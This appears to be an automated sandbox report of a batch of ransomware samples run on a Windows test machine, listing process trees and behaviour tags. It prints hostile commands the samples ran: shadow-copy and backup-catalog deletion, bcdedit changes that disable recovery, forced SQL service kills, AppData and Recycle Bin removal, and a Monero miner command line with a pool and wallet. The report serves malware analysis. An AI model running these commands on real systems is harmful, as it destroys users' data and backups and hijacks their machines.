description pid Process procid_target PID 2772 wrote to memory of 2004 2772 taskmgr.exe 103 PID 2772 wrote to memory of 2004 2772 taskmgr.exe 103 PID 1760 wrote to memory of 5092 1760 powershell.exe 110 PID 1760 wrote to memory of 5092 1760 powershell.exe 110 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 3112 5092 cmd.exe 112 PID 5092 wrote to memory of 3112 5092 cmd.exe 112 PID 5092 wrote to memory of 4432 5092 cmd.exe 113 PID 5092 wrote to memory of 4432 5092 cmd.exe 113 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 4888 5092 cmd.exe 116 PID 5092 wrote to memory of 4888 5092 cmd.exe 116 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 4888 wrote to memory of 1144 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 125 PID 4888 wrote to memory of 1144 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 125 PID 5092 wrote to memory of 4200 5092 cmd.exe 207 PID 5092 wrote to memory of 4200 5092 cmd.exe 207 PID 5092 wrote to memory of 4200 5092 cmd.exe 207 PID 1144 wrote to memory of 3464 1144 cmd.exe 184 PID 1144 wrote to memory of 3464 1144 cmd.exe 184 PID 5092 wrote to memory of 32 5092 cmd.exe 130 PID 5092 wrote to memory of 32 5092 cmd.exe 130 PID 32 wrote to memory of 1472 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 131 PID 32 wrote to memory of 1472 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 131 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 4888 wrote to memory of 756 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 133 PID 4888 wrote to memory of 756 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 133 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 1472 wrote to memory of 1396 1472 Enhancement 135 PID 1472 wrote to memory of 1396 1472 Enhancement 135 PID 32 wrote to memory of 2380 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 138 PID 32 wrote to memory of 2380 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 138 PID 756 wrote to memory of 3076 756 cmd.exe 139 PID 756 wrote to memory of 3076 756 cmd.exe 139 PID 5092 wrote to memory of 3672 5092 cmd.exe 141 PID 5092 wrote to memory of 3672 5092 cmd.exe 141 PID 5092 wrote to memory of 3672 5092 cmd.exe 141 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2380 wrote to memory of 4644 2380 cmd.exe 143 PID 2380 wrote to memory of 4644 2380 cmd.exe 143 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1856 attrib.exe 1944 attrib.exe 1800 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00426.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3256
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2004 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops desktop.ini file(s)
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 8964⤵
- Program crash
PID:2036
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3112 -
C:\WINDOWS\explorer.exeC:\WINDOWS\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:7777 --user=44ZbNFaekfHa23g4diPcvAcMkqsmYpLvV9DjqgJwofqHCxtfukqzt3LHHr9Y8Ur8tnJJcLCqsyivmHgu6bzDuaYi5r9GR3S+150000 --pass=yagemob --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=2 --unam-idle-cpu=804⤵PID:5688
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exe3⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Users\Admin\AppData\Local\Fast\Fast.exe"C:\Users\Admin\AppData\Local\Fast\Fast.exe" /firstrun4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 19245⤵
- Program crash
PID:1196
-
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:648 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=2/ct=2/rt=05⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4052
-
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exeHEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlservr.exe /T"4⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlservr.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlceip.exe /T"4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlceip.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlwriter.exe /T"4⤵PID:2632
-
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlwriter.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Admin\AppData /s /q"4⤵PID:3904
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Default\AppData /s /q"4⤵PID:4076
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Public\AppData /s /q"4⤵PID:2836
-
-
C:\Windows\system32\cmd.execmd /C "attrib +h +s Encrypt.exe"4⤵
- Hide Artifacts: Hidden Files and Directories
PID:2008 -
C:\Windows\system32\attrib.exeattrib +h +s Encrypt.exe5⤵
- Views/modifies file attributes
PID:1856
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop MSSQL$SQLEXPRESS"4⤵PID:3292
-
C:\Windows\system32\net.exenet stop MSSQL$SQLEXPRESS5⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS6⤵PID:3832
-
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir F:\$Recycle.Bin /s /q"4⤵PID:4312
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\$Recycle.Bin /s /q"4⤵PID:1224
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exeHEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exeHEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe4⤵PID:1928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9004⤵
- Program crash
PID:3832
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exeHEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0dda7230-3da2-4000-b101-6367093b30da" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe"C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6092 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ebae5ddd-6f41-43a7-af86-4b49c73c4f64" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5220
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 20844⤵
- Program crash
PID:2076
-
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exeTrojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Users\Admin\AppData\Roaming\Chromium Updater Module.exe"C:\Users\Admin\AppData\Roaming\Chromium Updater Module.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
PID:632
-
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exeTrojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe3⤵
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2076
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exeTrojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exeTrojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Users\Admin\AppData\Roaming\AccessRendezvous\EnhancementC:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement /go4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & del "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & rd "C:\Users\Admin\AppData\Roaming\AccessRendezvous\"5⤵PID:1396
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y6⤵PID:4396
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement"6⤵
- Views/modifies file attributes
PID:1800
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe" & del "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe" & rd "C:\Users\Admin\Desktop\00426\"4⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y5⤵PID:4644
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe"5⤵
- Views/modifies file attributes
PID:1944
-
-
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exeTrojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SayCheese.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\SayCheese.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:736 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.exe"5⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:1672
-
-
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exeTrojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3672
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exeTrojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:436
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exeTrojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1164 -
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe"C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe"4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:5556
-
-
-
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exeTrojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
PID:1176 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no5⤵
- System Location Discovery: System Language Discovery
PID:5256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- System Location Discovery: System Language Discovery
PID:5184
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
- System Location Discovery: System Language Discovery
PID:5304
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat5⤵
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- System Location Discovery: System Language Discovery
PID:1076
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 05⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3404
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 15⤵
- Executes dropped EXE
PID:5432
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe4⤵
- System Location Discovery: System Language Discovery
PID:3316
-
-
-
C:\Users\Admin\Desktop\00426\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exeUDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe"C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe" -ORIGIN:"C:\Users\Admin\Desktop\00426\"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exeC:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe "C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\CET_TRAINER.CETRAINER" "-ORIGIN:C:\Users\Admin\Desktop\00426\"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start http://mrantifun.net/6⤵
- System Location Discovery: System Language Discovery
PID:4668 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://mrantifun.net/7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffbc80b46f8,0x7ffbc80b4708,0x7ffbc80b47188⤵PID:1944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:28⤵PID:752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:38⤵PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2464 /prefetch:88⤵PID:5096
-
-
